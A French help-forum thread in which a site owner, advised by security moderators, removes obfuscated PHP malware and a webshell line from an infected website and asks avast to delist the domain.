voici le rapport du scan NOD32 sur mon PC, ce sont les mêmes fichiers qui ont été identifiés par avast.

que faut il faire maintenant?
1. les supprimer ? le problème c'est que je les ai déjà supprimé du site et que cela ne règle pas le blocage du site par avast..
2. les mettre en quarantaine?
3. autre solution?

C:\0 Sauvegarde site complet\virus potentiel\cfcopy.php PHP/Obfuscated.F application potentiellement indésirable supprimé - mis en quarantaine
C:\0 Sauvegarde site complet\virus potentiel\default.php PHP/Obfuscated.F application potentiellement indésirable supprimé - mis en quarantaine
C:\0 Sauvegarde site complet\virus potentiel\hhint.php PHP/Obfuscated.F application potentiellement indésirable supprimé - mis en quarantaine
C:\0 Sauvegarde site complet\virus potentiel\nlsource.php PHP/Obfuscated.F application potentiellement indésirable supprimé - mis en quarantaine
C:\0 Sauvegarde site complet\virus potentiel\z_admin.php PHP/Obfuscated.F application potentiellement indésirable supprimé - mis en quarantaine

Merci à toi.
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Mets en quarantaine.
S'ils sont en ligne, supprime les.
Supprime default.php qui est en ligne.
Vérifie le contenu de contactpage.php
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   > Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 
tous les fichiers ont été supprimés. il restait en effet default.php qui était en ligne dans 3 endroits différents , je les ai tous supprimés maintenant


j'ai analysé contactpage.php avec virustotal la seule infection est la suivante :
Bkav CPR2233.Webshell 20150119

pour info, après ces suppressions, voici les résultats avast suite à consultation du site avec ie ou firefox:
IE: menace Frame-inf [tRJ]
FIREFOX: RedirME-inf [Trj]

autre info: après vérification des sauvegardes, il semblerait que le webmaster qui a réalisé mon site en 2012 était infecté et m'a livré mon site déjà infecté dès l'origine
0
Réponse 15 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
tout est supprimé
pour la ligne64 à supprimer dans contactpage:



est ce la seule ligne 15 à supprimer?
ou est ce les lignes 14+15+16 à supprimer?
0
juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
 
14 et 16 sont des commentaires (#) qui "balisent" le code malveillant. tu peux les supprimer oui :)
0
Réponse 16 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
tous les fichiers infectés ont été supprimés
la ligne base64 de contactpage a été supprimée
le site est mis à jour
la machine rebooté.
mais sur IE tout comme firefox j'ai toujours le même blocage d'avast?
0
Réponse 17 / 24
juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
 
Il est sous quel OS ton serveur, un Linux ?
Si tu peux installer des trucs dessus, essaie ClamAV : http://www.clamav.net/
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
clamAV permet-il de nettoyer un réseau sous windows serveur 2003 R2?
0
Réponse 18 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
windows serveur 2003 R2
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Faudrait scanner le serveur avec un antivirus, parce que là on a vérifié que ton poste à priori.
0
Réponse 19 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
1. que penses tu malekal sur l'idée de scanner le serveur avec clamav comme le suggère juju ?

2. puisque avast réagit toujours, c'est que certains fichiers sont encore infectés? dans ce cas faudrait il les passer en revue un après l'autre comme le suggère juju? le problème c'est que :

A j'ai 997 fichiers sur le site! faut il tous les contrôler? peut on hiérarchiser ce travail pour le rendre moins chronophage ? il y a t'il des indices qui nous permettraient de ne traiter qu'une partie comme par ex: ne contrôler que les fichiers avec une extension spécifique? ne pas traiter les autres car inutile? ne traiter que les fichiers dans certaines rubriques etc...
B comment identifier les codes malveillants dans les lignes des fichiers? est ce toujours celles contenant "ligne64"?
C si j'entreprends cet énorme travail, suis je sur à l'arrivée d'obtenir enfin une réparation du site?
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Supprime le fichier .htaccess et default.php
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   > Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 
htaccess se trouve dans deux endroits du site. je viens de le supprimer dans les deux.
j'avais déjà supprimé default.php

après test du site : même réaction de blocage d'avast:
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
La détection URL:MAL
Vu que le site doit avoir des malwares depuis 2012, il doit être présent dans leurs blacklists.

Contact les pour leur demande s'il y a une blacklist et de la retirer en disant que tu as nettoyer le site.

Tu peux le faire sur le forum : https://forum.avast.com/index.php?board=23.0
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   > Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 
Je viens d'envoyer le message à avast, je te tiens informé
0
Réponse 20 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
bonsoir,
voici en retour les analyses d'avast, suite à ma demande de sortir notre site de la blackliste compte tenu de son nettoyage complet et récent:


http://zulu.zscaler.com/submission/show/5ed7d1ec0fbf8def473fa28104b776b4-1421778070
https://www.virustotal.com/gui/url/b0c255484fa682ed96919ce0c80686eb8a299cda04cae6a434d2868166081753
https://www.urlvoid.com/scan/l-eau.eu/

http://www.scumware.org/search.scumware
IFrame trojans

http://urlquery.net/report.php?id=1421778277330
https://sitecheck.sucuri.net/results/l-eau.eu
http://www.scamvoid.com/check/l-eau.eu
http://urlquery.net/report.php?id=1421778618153
https://www.ssllabs.com/ssltest/analyze.html?d=l-eau.eu
https://dnscheck.pingdom.com/?domain=l-eau.eu
http://multirbl.valli.org/lookup/91.216.107.195.html
https://quttera.com/detailed_report/l-eau.eu

que faut il en conclure? comment y répondre?
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
que ton site est blacklisté sur bcp de listes, vu qu'il a été infecté depuis 2012.
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
peux tu me dire malekal, par rapport au travail que l'on a fait ensemble, quels sont les points encore à traiter pour solliciter la sortie de la blackliste?
0
juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
 
Il faudrait remettre un htaccess aussi.
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   > juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention  
 
c'est indispensable?
le problème c'est qu'il est infecté! comment le récupérer et le rendre sain?
merci
0
juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
 
poste son contenu.
0

Discussions similaires

la balise <br> ou <br />
faamugol -
rwaness -

8 réponses
<br> ou <br /> ou </br>
corentin.93 -
jessy006 -

11 réponses
Balise </br>
erf -
erf -

3 réponses
Espace en HTML
baissaoui -
baissaoui -

0 réponse
Saut de lignes sans <br/>
Rapi-shiny -
Rapi-shiny -

13 réponses